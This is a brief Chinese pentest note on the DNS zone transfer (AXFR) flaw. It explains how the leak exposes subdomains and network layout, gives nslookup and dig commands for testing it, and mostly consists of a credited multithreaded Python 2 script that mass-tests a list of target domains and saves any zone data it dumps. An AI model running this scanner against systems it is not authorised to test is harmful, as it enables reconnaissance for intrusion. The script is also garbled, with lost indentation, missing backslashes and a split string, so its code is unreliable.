前言
DNS服务器分为:主服务器、备份服务器和缓存服务器。
域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。
在主备服务器之间同步数据库,需要使用“DNS域传送”
危害:利用该漏洞可获取网络拓扑,获取所有子域名记录
nslookup
nslookup进入交互式
server ns.test.edu.cn 设置dns服务器
ls test.edu.cn 查询域名
dig
dig @ns1.test.edu.cn axfr test.edu.cn
EXP
nslookup+dig 批量
# encoding=gbk
# From my[at]lijiejie.com http://www.lijiejie.com
import threading
import os
import re
urls = []
fobj = open('target_list.txt')
for eachline in fobj.readlines():
urls.append(eachline)
lock = threading.Lock()
c_index = 0
def test_DNS_Servers():
global c_index
while True:
lock.acquire()
if c_index >= len(urls):
lock.release()
break # End of list
domain = urls[c_index].lstrip('www.')
print "---testing:" + domain
c_index += 1
lock.release()
cmd_res = os.popen('nslookup -type=ns ' + domain).read() # fetch DNS Server List
dns_servers = re.findall('nameserver = ([w.]+)', cmd_res)
for server in dns_servers:
if len(server) < 5: server += domain
cmd_res = os.popen(os.getcwd() + '\BIND9\dig @%s axfr %s' % (server, domain)).read()
if cmd_res.find('Transfer failed.') < 0 and
cmd_res.find('connection timed out') < 0 and
cmd_res.find('XFR size') > 0 :
lock.acquire()
print '*' * 10 + ' Vulnerable dns server found:', server, '*' * 10
lock.release()
with open('vulnerable_hosts.txt', 'a') as f:
f.write('%s %s
' % (server.ljust(30), domain))
with open('dns\' + server + '.txt', 'w') as f:
f.write(cmd_res)
threads = []
for i in range(10):
t = threading.Thread(target=test_DNS_Servers)
t.start()
threads.append(t)
for t in threads:
t.join()
print 'All Done!'